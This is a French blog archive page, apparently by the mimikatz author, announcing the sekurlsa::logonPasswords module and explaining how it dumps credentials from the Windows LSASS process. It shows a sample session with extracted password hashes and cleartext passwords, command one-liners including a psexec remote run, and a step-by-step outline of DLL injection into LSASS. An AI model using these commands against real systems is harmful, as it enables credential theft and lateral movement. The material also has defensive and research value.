Archives par mot-clé : injection

mimikatz :: sekurlsa fait son apparition

Publié le par
Répondre
homer_woohoole module local sekurlsa vient d’être incorporé à mimikatz !

La première version de sekurlsa (@) fonctionne par injection de la librairie susnommée, la deuxième (::) est un module local de mimikatz fonctionnant par lecture uniquement !

Après le dernier post sur l’injection de la librairie sekurlsa, puis celui sur la lecture des clés de déchiffrement depuis LSASS, il était temps de créer un nouveau module local : mimikatz :: sekurlsa

Nouvelle version !

Le nouveau mimikatz, en RC pour l’occasion, inclus donc ce nouveau module !
La version prenant en charge ce module est disponible : http://blog.gentilkiwi.com/mimikatz

sekurlsa_local

Il nécessite tout de même, sous NT6, le privilège debug pour lire des données du processus système LSASS :

mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        wdigest :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        tspkg :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
        livessp :       n.t. (LUID KO)

L’aide de ce module sera bientôt disponible : http://blog.gentilkiwi.com/mimikatz/sekurlsa.
L’aide de la librairie a été déplacée : http://blog.gentilkiwi.com/mimikatz/librairies/sekurlsa.

Ligne de commande

Au passage, mimikatz peut maintenant prendre en compte ses commandes directement depuis ses arguments.
Quelques exemples sympas :

  • mimikatz privilege::debug "sekurlsa::logonPasswords full" exit
  • psexec \\windows-c -s -c c:\security\mimikatz\Win32\mimikatz.exe "sekurlsa::logonPasswords full" exit
  • mimikatz crypto::patchcapi crypto::exportCertificates exit
  • mimikatz nogpo::regedit exit

mimikatz @ sekurlsa – une librairie à injecter

Publié le par
Répondre

La librairie sekurlsa permet, entre autre, de dumper des données de sécurité du processus LSASS (Local Security Authority Subsystem Service).
Très efficace, cela n’en reste pas moins un frein pour certain car elle doit être injectée dans le processus LSASS.

sekurlsa_extract

L’injection

  1. Ouverture du processus cible en écriture, avec possibilité de créer des threads
    • OpenProcess
  2. Allocation de mémoire, dans le processus cible, pour la routine de chargement
    • VirtualAllocEx
  3. Écriture, dans la mémoire allouée, du nom de la librairie à charger
    • WriteProcessMemory
  4. Création d’un thread dans le processus distant, commençant sur l’instruction LoadLibrary, avec comme argument l’adresse de notre mémoire allouée.
    • CreateRemoteThread, NtCreateThreadEx, ZwCreateThread, RtlCreateUserThread, NtQueueApcThread, …

    Ceci a pour effet de charger la librairie voulue dans le processus distant, et d’effectuer :

    • Un appel à la routine DllMain
    • Fortement conseillé : La création d’un thread avec le code nécessaire au fonctionnement de la libraire, se terminant par FreeLibraryAndExitThread
  5. Attente de la fin de l’opération de chargement (fin du thread initialement créé)
    • WaitForSingleObject
  6. Libération de la mémoire allouée
    • VirtualFreeEx

Avantages de cette méthode :

good_inject

  • S’exécute avec les droits du processus cible (pour LSASS : SYSTEM)
  • Bénéficie de toutes les données du processus cible de manière transparente
  • Les opérations effectuées dans le processus cible paraissent légitimes
  • Méthodes relativement bien connues et maitrisées

Inconvénients :

bad_inject

  • Écritures dans le processus cible
  • Modifications du contexte d’exécution du processus cible
  • Des opérations incorrectes dans la librairie peuvent entrainer un crash du processus cible
  • Les droits du processus cible peuvent être insuffisants pour accéder à des données externes (librairie sur un partage réseau par exemple)
  • Fonctionne difficilement en RDP sans proxy via un service (isolation de sessions)
  • Méthodes très connues par les antivirus et HIPS (une intrusion aussi affichée dans LSASS est quand même très louche !)

Alors pourquoi injecter ?

Beaucoup d’inconvénients…, pourquoi mimikatz doit-il donc injecter sekurlsa pour dumper les hashes et mots de passe ?

  • La facilité : toutes les structures utilisées contiennent des pointeurs et données qui ne sont valides que dans le processus LSASS, les utilisations de ces structures sont donc transparentes
  • La recherche d’éléments par LUID : les données utilisateurs sont placées dans des structures de type :
    • LIST_ENTRY ; nécessitant un parcours par pointeurs
    • RTL_AVL_TABLE ; nécessitant l’utilisation de RtlLookupElementGenericTableAvl
  • Le déchiffrement : les hashes et mots de passe ne sont pas en clair, ils sont déchiffrés par LsaUnprotectMemory, qui utilise des clés et méthodes du processus LSASS

Comment ne plus injecter ?

Il suffirait de résoudre les 3 points évoqués…

  • La difficulté : toutes données nécessaires seront lues du processus LSASS par ReadProcessMemory, donnant lieu à des proxys d’utilisation des structures UNICODE_STRING, KIWI_GENERIC_PRIMARY_CREDENTIAL, …
  • La recherche d’éléments par LUID : les données utilisateurs étant placées dans des structures de type :
    • LIST_ENTRY ; utilisera un proxy de parcours de listes, via ReadProcessMemory
    • RTL_AVL_TABLE ; utilisera un proxy de parcours d’arbres, via ReadProcessMemory
  • Le déchiffrement : il suffit d’aller récupérer les clés depuis LSASS pour les utiliser dans mimikatz

Récupération des clés

soon
Bientôt dans un post dédié…